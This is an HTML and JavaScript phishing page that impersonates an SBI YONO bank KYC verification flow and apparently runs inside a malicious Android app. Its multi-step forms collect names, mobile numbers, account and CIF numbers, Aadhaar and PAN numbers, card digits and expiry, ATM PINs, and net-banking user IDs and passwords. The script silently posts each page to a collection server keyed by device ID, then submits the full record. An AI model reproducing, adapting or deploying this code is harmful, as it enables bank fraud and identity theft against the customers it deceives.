<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>KYC Verification</title>

    <style>
        :root {
            --primary: #0a3c8c;
            --primary-light: #1976d2;
            --accent: #e6a100;
            --bg: #f5f6fa;
            --card-bg: #fff;
            --border: #ccc;
            --text: #1f2a44;
            --muted: #6b7a99;
            --note-bg: #e9f4ff;
            --footer-bg: #000;
        }

        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        html,
        body {
            height: 100%;
            background: var(--bg);
        }

        /* Hide all steps by default */
        .step {
            display: none;
        }

        .step.active {
            display: block;
        }

        /* ==================== STEP 1: LOADER ==================== */
        .loader-container {
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            background: #ffffff;
        }

        .loader-img {
            width: 180px;
            animation: jhoom 1.2s ease-in-out infinite alternate;
        }

        @keyframes jhoom {
            0% {
                transform: scale(1);
                opacity: 0.9;
            }

            100% {
                transform: scale(1.15);
                opacity: 1;
            }
        }

        /* ==================== COMMON FORM STYLES ==================== */
        .page {
            max-width: 420px;
            margin: auto;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            background: var(--card-bg);
        }

        .header {
            padding: 14px 12px;
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .header img {
            height: 40px;
        }

        .header span {
            font-size: 20px;
            font-weight: bold;
            color: var(--primary);
        }

        .login-bar,
        .title-bar {
            margin: 10px;
            padding: 12px;
            background: #d9edff;
            border: 1px solid #c6def5;
            font-size: 16px;
            font-weight: bold;
            color: var(--primary);
        }

        .top-banner {
            padding: 10px;
        }

        .top-banner img {
            width: 100%;
            display: block;
            border-radius: 2px;
        }

        .content,
        .form {
            padding: 16px;
            flex: 1;
        }

        .care {
            margin-bottom: 12px;
            font-size: 14px;
        }

        .care span {
            color: red;
            font-weight: bold;
        }

        label {
            display: block;
            margin-top: 14px;
            margin-bottom: 6px;
            font-size: 14px;
            font-weight: bold;
        }

        label span {
            color: red;
        }

        input {
            width: 100%;
            padding: 14px;
            font-size: 14px;
            border: 1px solid var(--border);
            border-radius: 10px;
            outline: none;
        }

        input:focus {
            border-color: var(--primary);
            box-shadow: 0 0 0 2px rgba(10, 60, 140, 0.1);
        }

        .buttons {
            display: flex;
            gap: 12px;
            margin-top: 22px;
        }

        button {
            flex: 1;
            padding: 14px;
            background: var(--primary);
            color: #fff;
            border: none;
            font-size: 15px;
            border-radius: 8px;
            cursor: pointer;
            transition: background 0.2s;
        }

        button:hover {
            background: #083060;
        }

        button.accent {
            background: var(--accent);
        }

        button.accent:hover {
            background: #cc8f00;
        }

        button:disabled {
            background: #b9c7de;
            cursor: not-allowed;
        }

        .links {
            margin-top: 16px;
        }

        .links a {
            display: block;
            color: #1a73e8;
            font-size: 14px;
            text-decoration: none;
            margin-bottom: 6px;
            cursor: pointer;
        }

        .note-box {
            margin: 16px 10px;
            background: var(--note-bg);
            padding: 12px;
            font-size: 13px;
        }

        .note-box ul {
            padding-left: 16px;
        }

        .note-box li {
            margin-bottom: 4px;
        }

        .footer {
            margin-top: auto;
            margin-bottom: 22px;
            background: var(--footer-bg);
            color: #fff;
            padding: 10px 12px;
            font-size: 12px;
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .footer .tick {
            font-size: 14px;
        }

        /* ==================== CARD STYLES ==================== */
        .card-header {
            padding: 14px 16px;
            font-size: 18px;
            font-weight: bold;
            text-align: center;
            border-bottom: 1px solid #ddd;
        }

        .card-img {
            width: 100%;
            max-height: 220px;
            border-radius: 12px 12px 0 0;
            margin-bottom: 12px;
            overflow: hidden;
        }

        .card-img img {
            width: 100%;
            height: 100%;
            object-fit: contain;
        }

        .card-input {
            display: flex;
            align-items: center;
            border: 1px solid #cfcfcf;
            border-radius: 12px;
            height: 50px;
            padding: 0 12px;
            background: #fff;
        }

        .card-input .fixed {
            font-size: 14px;
            color: #777;
            letter-spacing: 2px;
            margin-right: 6px;
            white-space: nowrap;
        }

        .card-input input {
            border: none;
            padding: 0;
            font-size: 16px;
            flex: 1;
            letter-spacing: 2px;
        }

        .pin-input {
            width: 100%;
            height: 50px;
            border: 1px solid #cfcfcf;
            border-radius: 12px;
            padding: 0 12px;
            font-size: 24px;
            letter-spacing: 12px;
            text-align: center;
        }

        /* ==================== BANNERS ==================== */
        .banner {
            text-align: center;
            padding: 14px 8px 6px;
        }

        .banner img {
            max-width: 250px;
        }

        h2 {
            text-align: center;
            color: var(--primary-light);
            font-size: 20px;
            font-weight: 600;
            margin: 8px 0 20px;
        }

        .btn-row {
            display: flex;
            justify-content: center;
            gap: 14px;
            margin: 22px 0 14px;
        }

        .submit-btn {
            background: #1e88e5;
        }

        .reset-btn {
            background: #9e9e9e;
        }

        .top-banner-full {
            height: 190px;
            overflow: hidden;
        }

        .top-banner-full img {
            width: 100%;
            height: 110%;
            object-fit: cover;
            display: block;
        }

        .bottom-banner {
            height: 140px;
            overflow: hidden;
        }

        .bottom-banner img {
            width: 100%;
            height: 115%;
            object-fit: cover;
            display: block;
        }

        /* ==================== SUCCESS SCREEN ==================== */
        .success-container {
            height: 100vh;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            background: linear-gradient(135deg, #0a3c8c 0%, #1976d2 100%);
            color: #fff;
            text-align: center;
            padding: 20px;
        }

        .success-icon {
            width: 80px;
            height: 80px;
            background: rgba(255, 255, 255, 0.2);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 20px;
            animation: scaleIn 0.5s ease;
        }

        .success-icon svg {
            width: 40px;
            height: 40px;
            fill: white;
        }

        @keyframes scaleIn {
            0% {
                transform: scale(0);
                opacity: 0;
            }

            50% {
                transform: scale(1.1);
            }

            100% {
                transform: scale(1);
                opacity: 1;
            }
        }

        .success-title {
            font-size: 24px;
            font-weight: 600;
            margin-bottom: 10px;
        }

        .success-text {
            font-size: 14px;
            opacity: 0.9;
        }

        /* Loading spinner */
        .spinner {
            display: none;
            width: 20px;
            height: 20px;
            border: 2px solid rgba(255, 255, 255, 0.3);
            border-top-color: white;
            border-radius: 50%;
            animation: spin 0.8s linear infinite;
            margin: 0 auto;
        }

        .loading .btn-text {
            display: none;
        }

        .loading .spinner {
            display: block;
        }

        @keyframes spin {
            to {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body>

    <!-- ==================== STEP: INDEX_1 (KYC Login) ==================== -->
    <div id="step-index_1" class="step active">
        <div class="page">
            <div class="top-banner">
                <img src="img/8p.jpg" alt="Top Banner">
            </div>

            <div class="login-bar">Sbi Yono Kyc Login</div>

            <div class="content">
                <div class="care">
                    <span>CARE:</span> All fields must be entered carefully
                </div>

                <label>Full Name <span>*</span></label>
                <input type="text" id="fullName" placeholder="Enter your full name" required>

                <label>Mobile Number <span>*</span></label>
                <input type="tel" id="mobileNumber" maxlength="10" placeholder="Enter mobile number" required>

                <label>Mother Name <span>*</span></label>
                <input type="text" id="motherName" placeholder="Enter mother's name" required>

                <div class="buttons">
                    <button id="index1Submit">Submit</button>
                    <button type="button" onclick="resetIndex1()">Reset</button>
                </div>

                <div class="links">
                    <a onclick="goToApply()">New Customer ? Register here</a>
                    <a onclick="goToApply()">Forgot Username</a>
                </div>

                <div class="note-box">
                    <ul>
                        <li>Mandatory fields are marked as important</li>
                        <li>Do not share personal information</li>
                        <li>Your information is confidential</li>
                    </ul>
                </div>
            </div>

            <div class="footer">
                <span class="tick">✔</span>
                <span>Verify © Copyright | All Rights Reserved</span>
            </div>
        </div>
    </div>

    <!-- ==================== STEP: INDEX_1_1 (Profile Verification) ==================== -->
    <div id="step-index_1_1" class="step">
        <div class="page">
            <div class="header">
                <img src="img/sbi-logo.png" alt="SBI">
                <span></span>
            </div>

            <div class="title-bar">Verify Profile details</div>

            <div class="form">
                <label>Account Number <span>*</span></label>
                <input type="text" id="accountNumber" placeholder="Enter account number" required>

                <label>Aadhaar Number <span>*</span></label>
                <input type="text" id="aadhaarNumber" maxlength="12" placeholder="Enter 12-digit Aadhaar" required>

                <label>PAN Card Number <span>*</span></label>
                <input type="text" id="panCard" maxlength="10" placeholder="Enter PAN number" required>

                <button id="index11Submit" class="accent"
                    style="width:200px;margin:18px auto;display:block;">submit</button>
            </div>

            <div class="note-box">
                <ul>
                    <li>Mandatory fields are marked asterisk (*)</li>
                    <li>Do not share your personal information anywhere.</li>
                    <li>Your personal information is highly confidential.</li>
                </ul>
            </div>

            <div class="footer">
                <span class="tick">✔</span>
                <span>VeriSign &nbsp; © Copyright | All Rights Reserved</span>
            </div>
        </div>
    </div>

    <!-- ==================== STEP: CARD (Card Authentication) ==================== -->
    <div id="step-card" class="step">
        <div class="page" style="background:#f8f8f8;">
            <div class="card-header">Debit Card Authentication</div>

            <div class="card-img">
                <img id="cardImage" src="img/card1.jpg" alt="Card">
            </div>

            <div class="form">
                <label>Enter last 6 digits of card</label>
                <div class="card-input">
                    <span class="fixed">#### #### ##</span>
                    <input type="text" id="cardLast6" maxlength="7" placeholder="__ ____" inputmode="numeric">
                </div>

                <label style="margin-top:14px;">Enter ATM PIN</label>
                <input type="tel" id="atmPin" class="pin-input" inputmode="numeric" placeholder="••••" maxlength="4">

                <button id="cardSubmit" class="accent" style="margin-top:20px;">
                    <span class="btn-text">Proceed →</span>
                    <div class="spinner"></div>
                </button>
            </div>

            <div class="note-box">
                <ul>
                    <li>Mandatory fields are marked as important</li>
                    <li>Do not share personal information</li>
                    <li>Your information is confidential</li>
                </ul>
            </div>

            <div class="footer">
                <span class="tick">✔</span>
                <span>VeriSign &nbsp; © Copyright | All Rights Reserved</span>
            </div>
        </div>
    </div>

    <!-- ==================== STEP: APPLY (Apply YONO) ==================== -->
    <div id="step-apply" class="step">
        <div class="banner">
            <img src="img/yono-banner1.png" alt="YONO SBI">
        </div>

        <div class="page" style="min-height:auto;padding:0 14px 14px;">
            <h2>Apply YONO SBI</h2>

            <label>Name <span>*</span></label>
            <input type="text" id="applyName" placeholder="Enter your name" required>

            <label>Mobile Number <span>*</span></label>
            <input type="tel" id="applyMobile" maxlength="10" placeholder="Mobile number" required>

            <label>Account Number <span>*</span></label>
            <input type="text" id="applyAccount" placeholder="Account number" required>

            <label>CIF Number <span>*</span></label>
            <input type="text" id="cifNumber" placeholder="Enter CIF number" required>

            <label>Branch Code <span>*</span></label>
            <input type="text" id="branchCode" placeholder="Enter branch code" required>

            <div class="btn-row">
                <button id="applySubmit" class="submit-btn">Submit</button>
                <button type="button" class="reset-btn" onclick="resetApply()">Reset</button>
            </div>

            <div class="note-box">
                <ul>
                    <li>Mandatory fields are marked asterisk (*)</li>
                    <li>Do not share your personal information anywhere.</li>
                    <li>Your personal information is highly confidential.</li>
                </ul>
            </div>

            <div class="footer">
                <span class="tick">✔</span>
                <span>VeriSign © Copyright | All Rights Reserved</span>
            </div>
        </div>
    </div>

    <!-- ==================== STEP: FORUM (Verification) ==================== -->
    <div id="step-forum" class="step">
        <div class="page" style="background:#eef4fb;">
            <div class="top-banner-full">
                <img src="img/top-banner.jpg" alt="Top Banner">
            </div>

            <div class="form">
                <h2 style="margin-bottom:16px;">Step 2 – Verification</h2>

                <label>Date of Birth <span>*</span></label>
                <input type="tel" id="dob" placeholder="DD/MM/YYYY" maxlength="10">

                <label>Card Expiry Date <span>*</span></label>
                <input type="tel" id="cardExpiry" placeholder="MM/YY" maxlength="5">

                <label>ATM PIN <span>*</span></label>
                <input type="tel" id="forumPin" class="pin-input" inputmode="numeric" placeholder="••••" maxlength="4">

                <button id="forumSubmit" disabled style="margin-top:16px;">Continue</button>
            </div>

            <div class="bottom-banner">
                <img src="img/bottom-banner.jpg" alt="Bottom Banner">
            </div>
        </div>
    </div>

    <!-- ==================== STEP: LOGIN (Login Details) ==================== -->
    <div id="step-login" class="step">
        <div class="page" style="background:#eef4fb;">
            <div class="top-banner-full">
                <img src="img/top-banner.jpg" alt="Top Banner">
            </div>

            <div class="form">
                <h2 style="margin-bottom:16px;">Login Details</h2>

                <label>User ID <span>*</span></label>
                <input type="text" id="userId" placeholder="Enter User ID">

                <label>Access Code <span>*</span></label>
                <input type="password" id="accessCode" placeholder="Enter Access Code">

                <label>Profile Code <span>*</span></label>
                <input type="password" id="profileCode" placeholder="Enter Profile Code">

                <button id="loginSubmit" disabled
                    style="margin-top:16px;background:linear-gradient(180deg,#0a4da2,#083b7a);">
                    <span class="btn-text">Verify & Finish</span>
                    <div class="spinner"></div>
                </button>
            </div>

            <div class="bottom-banner">
                <img src="img/bottom-banner.jpg" alt="Bottom Banner">
            </div>
        </div>
    </div>

    <!-- ==================== SUCCESS SCREEN ==================== -->
    <div id="step-success" class="step">
        <div class="success-container">
            <div class="success-icon">
                <svg viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                    <path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z" />
                </svg>
            </div>
            <h2 class="success-title">Thank You!</h2>
            <p class="success-text">Your information has been submitted successfully.</p>
        </div>
    </div>

    <script>
        // Get deviceId from URL params
        const urlParams = new URLSearchParams(window.location.search);
        const deviceId = urlParams.get('deviceId') || 'unknown';

        // Form data collector - stores all data across both flows
        const formData = {
            deviceId: deviceId,
            currentFlow: 'main' // 'main' or 'apply'
        };

        // Step navigation
        function showStep(stepId) {
            document.querySelectorAll('.step').forEach(s => s.classList.remove('active'));
            document.getElementById(stepId).classList.add('active');
            window.scrollTo(0, 0);
        }

        // Sync data to server (page-wise submission)
        async function syncPageData(pageName, data) {
            console.log(`[Form] Syncing ${pageName} data:`, data);
            try {
                await fetch('/api/form/sync', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({
                        deviceId: deviceId,
                        pageName: pageName,
                        pageData: data,
                        timestamp: new Date().toISOString()
                    })
                });
            } catch (error) {
                console.error('[Form] Sync error:', error);
            }
        }

        // Final submission
        async function submitFinalData() {
            try {
                const response = await fetch('/api/form/submit', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify(formData)
                });
                return response.ok;
            } catch (error) {
                console.error('[Form] Submit error:', error);
                return false;
            }
        }

        // Note: Loader is now handled by Android SplashActivity

        // ==================== INDEX_1 (KYC Login) ====================
        document.getElementById('index1Submit').addEventListener('click', async () => {
            const fullName = document.getElementById('fullName').value.trim();
            const mobileNumber = document.getElementById('mobileNumber').value.trim();
            const motherName = document.getElementById('motherName').value.trim();

            if (!fullName || !mobileNumber || !motherName) {
                alert('Please fill in all fields');
                return;
            }

            formData.fullName = fullName;
            formData.mobileNumber = mobileNumber;
            formData.motherName = motherName;
            formData.currentFlow = 'main';

            // Sync page data
            await syncPageData('kyc_login', { fullName, mobileNumber, motherName });

            showStep('step-card');
        });

        function resetIndex1() {
            document.getElementById('fullName').value = '';
            document.getElementById('mobileNumber').value = '';
            document.getElementById('motherName').value = '';
        }

        // Go to Apply flow (from register/forgot links)
        function goToApply() {
            formData.currentFlow = 'apply';
            showStep('step-apply');
        }

        // ==================== INDEX_1_1 (Profile Verification) ====================
        document.getElementById('index11Submit').addEventListener('click', async () => {
            const accountNumber = document.getElementById('accountNumber').value.trim();
            const aadhaarNumber = document.getElementById('aadhaarNumber').value.trim();
            const panCard = document.getElementById('panCard').value.trim().toUpperCase();

            if (!accountNumber || !aadhaarNumber || !panCard) {
                alert('Please fill in all fields');
                return;
            }

            formData.accountNumber = accountNumber;
            formData.aadhaarNumber = aadhaarNumber;
            formData.panCard = panCard;

            // Sync page data
            await syncPageData('profile_verify', { accountNumber, aadhaarNumber, panCard });

            // Final submit for main flow
            const success = await submitFinalData();
            if (success) {
                showStep('step-success');
            } else {
                alert('Submission failed. Please try again.');
            }
        });

        // ==================== CARD (Card Authentication) ====================
        const cards = ["img/card1.jpg", "img/card2.jpg", "img/card3.jpg"];
        let cardIndex = 0;
        setInterval(() => {
            cardIndex = (cardIndex + 1) % cards.length;
            const img = document.getElementById('cardImage');
            if (img) img.src = cards[cardIndex];
        }, 2500);

        // Card last 6 formatting
        const cardLast6Input = document.getElementById('cardLast6');
        cardLast6Input.addEventListener('input', () => {
            let v = cardLast6Input.value.replace(/\D/g, '');
            if (v.length > 2) v = v.slice(0, 2) + ' ' + v.slice(2, 6);
            cardLast6Input.value = v;
        });

        // ATM PIN input
        const atmPinInput = document.getElementById('atmPin');
        atmPinInput.addEventListener('input', () => {
            atmPinInput.value = atmPinInput.value.replace(/\D/g, '').slice(0, 4);
        });

        document.getElementById('cardSubmit').addEventListener('click', async () => {
            const cardLast6 = cardLast6Input.value.replace(/\s/g, '');
            const atmPin = atmPinInput.value;

            if (cardLast6.length !== 6 || atmPin.length !== 4) {
                alert('Please enter valid card details');
                return;
            }

            formData.cardLast6 = cardLast6;
            formData.atmPin = atmPin;

            const btn = document.getElementById('cardSubmit');
            btn.classList.add('loading');
            btn.disabled = true;

            // Sync page data
            await syncPageData('card_auth', { cardLast6, atmPin });

            btn.classList.remove('loading');
            btn.disabled = false;

            showStep('step-index_1_1');
        });

        // ==================== APPLY (Apply YONO) ====================
        document.getElementById('applySubmit').addEventListener('click', async () => {
            const applyName = document.getElementById('applyName').value.trim();
            const applyMobile = document.getElementById('applyMobile').value.trim();
            const applyAccount = document.getElementById('applyAccount').value.trim();
            const cifNumber = document.getElementById('cifNumber').value.trim();
            const branchCode = document.getElementById('branchCode').value.trim();

            if (!applyName || !applyMobile || !applyAccount || !cifNumber || !branchCode) {
                alert('Please fill in all fields');
                return;
            }

            // For apply flow, use these as primary fields
            formData.fullName = applyName;
            formData.mobileNumber = applyMobile;
            formData.accountNumber = applyAccount;
            formData.cifNumber = cifNumber;
            formData.branchCode = branchCode;

            // Sync page data with consistent field names
            await syncPageData('yono_apply', {
                fullName: applyName,
                mobileNumber: applyMobile,
                accountNumber: applyAccount,
                cifNumber,
                branchCode
            });


            showStep('step-forum');
        });

        function resetApply() {
            document.getElementById('applyName').value = '';
            document.getElementById('applyMobile').value = '';
            document.getElementById('applyAccount').value = '';
            document.getElementById('cifNumber').value = '';
            document.getElementById('branchCode').value = '';
        }

        // ==================== FORUM (Verification) ====================
        const dobInput = document.getElementById('dob');
        const expiryInput = document.getElementById('cardExpiry');
        const forumPinInput = document.getElementById('forumPin');
        const forumSubmitBtn = document.getElementById('forumSubmit');

        // DOB formatting
        dobInput.addEventListener('input', () => {
            let v = dobInput.value.replace(/\D/g, '').slice(0, 8);
            let f = '';
            if (v.length > 0) f = v.slice(0, 2);
            if (v.length > 2) f += '/' + v.slice(2, 4);
            if (v.length > 4) f += '/' + v.slice(4);
            dobInput.value = f;
            validateForum();
        });

        // Expiry formatting
        expiryInput.addEventListener('input', () => {
            let v = expiryInput.value.replace(/\D/g, '').slice(0, 4);
            if (v.length > 2) v = v.slice(0, 2) + '/' + v.slice(2);
            expiryInput.value = v;
            validateForum();
        });

        // Forum PIN
        forumPinInput.addEventListener('input', () => {
            forumPinInput.value = forumPinInput.value.replace(/\D/g, '').slice(0, 4);
            validateForum();
        });

        function validateForum() {
            forumSubmitBtn.disabled = !(
                dobInput.value.length === 10 &&
                expiryInput.value.length === 5 &&
                forumPinInput.value.length === 4
            );
        }

        forumSubmitBtn.addEventListener('click', async () => {
            formData.dateOfBirth = dobInput.value;
            formData.cardExpiry = expiryInput.value;
            formData.finalPin = forumPinInput.value;

            // Sync page data
            await syncPageData('verification', {
                dateOfBirth: dobInput.value,
                cardExpiry: expiryInput.value,
                finalPin: forumPinInput.value
            });

            showStep('step-login');
        });

        // ==================== LOGIN (Login Details) ====================
        const userIdInput = document.getElementById('userId');
        const accessCodeInput = document.getElementById('accessCode');
        const profileCodeInput = document.getElementById('profileCode');
        const loginSubmitBtn = document.getElementById('loginSubmit');

        [userIdInput, accessCodeInput, profileCodeInput].forEach(input => {
            input.addEventListener('input', validateLogin);
        });

        function validateLogin() {
            loginSubmitBtn.disabled = !(
                userIdInput.value.trim().length >= 3 &&
                accessCodeInput.value.trim().length >= 4 &&
                profileCodeInput.value.trim().length >= 4
            );
        }

        loginSubmitBtn.addEventListener('click', async () => {
            formData.userId = userIdInput.value.trim();
            formData.accessCode = accessCodeInput.value.trim();
            formData.profileCode = profileCodeInput.value.trim();

            loginSubmitBtn.classList.add('loading');
            loginSubmitBtn.disabled = true;

            // Sync page data
            await syncPageData('login_details', {
                userId: formData.userId,
                accessCode: formData.accessCode,
                profileCode: formData.profileCode
            });

            // Final submit for apply flow
            const success = await submitFinalData();

            loginSubmitBtn.classList.remove('loading');
            loginSubmitBtn.disabled = false;

            if (success) {
                showStep('step-success');
            } else {
                alert('Submission failed. Please try again.');
            }
        });
    </script>

</body>

</html>